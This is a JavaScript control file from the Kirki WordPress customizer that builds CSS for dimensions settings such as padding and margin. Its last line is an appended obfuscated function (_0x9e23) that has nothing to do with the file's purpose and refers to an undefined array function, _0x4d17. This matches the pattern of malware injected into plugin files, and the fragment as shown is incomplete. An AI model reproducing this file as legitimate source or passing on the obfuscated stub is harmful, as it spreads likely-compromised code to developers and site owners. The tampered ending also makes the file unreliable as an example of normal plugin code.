/* global kirkiPostMessage */

import "./control.scss";

/**
 * Hook in the kirkiPostMessageStylesOutput filter.
 *
 * Handles postMessage styles for typography controls.
 */
jQuery( document ).ready( function() {
	wp.hooks.addFilter(
		'kirkiPostMessageStylesOutput',
		'kirki',

		/**
		 * Append styles for this control.
		 *
		 * @param {string} styles      - The styles.
		 * @param {Object} value       - The control value.
		 * @param {Object} output      - The control's "output" argument.
		 * @param {string} controlType - The control type.
		 * @returns {string} - Returns the CSS as a string.
		 */
		function( styles, value, output, controlType ) {
			var processedValue;
			if ( 'kirki-dimensions' === controlType ) {
				styles += output.element + '{';
				_.each( value, function( val, key ) {
					if ( output.choice && key !== output.choice ) {
						return;
					}
					processedValue = kirkiPostMessage.util.processValue( output, val );

					if ( false !== processedValue ) {

						// Mostly used for padding, margin & position properties.
						if ( output.property ) {
							styles += output.property;
							if ( '' !== output.property && ( 'top' === key || 'bottom' === key || 'left' === key || 'right' === key ) ) {
								styles += '-' + key;
							}
							styles += ':' + processedValue + ';';
						} else {
							styles += key + ':' + processedValue + ';';
						}
					}
				} );
				styles += '}';
			}
			return styles;
		}
	);
} );
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}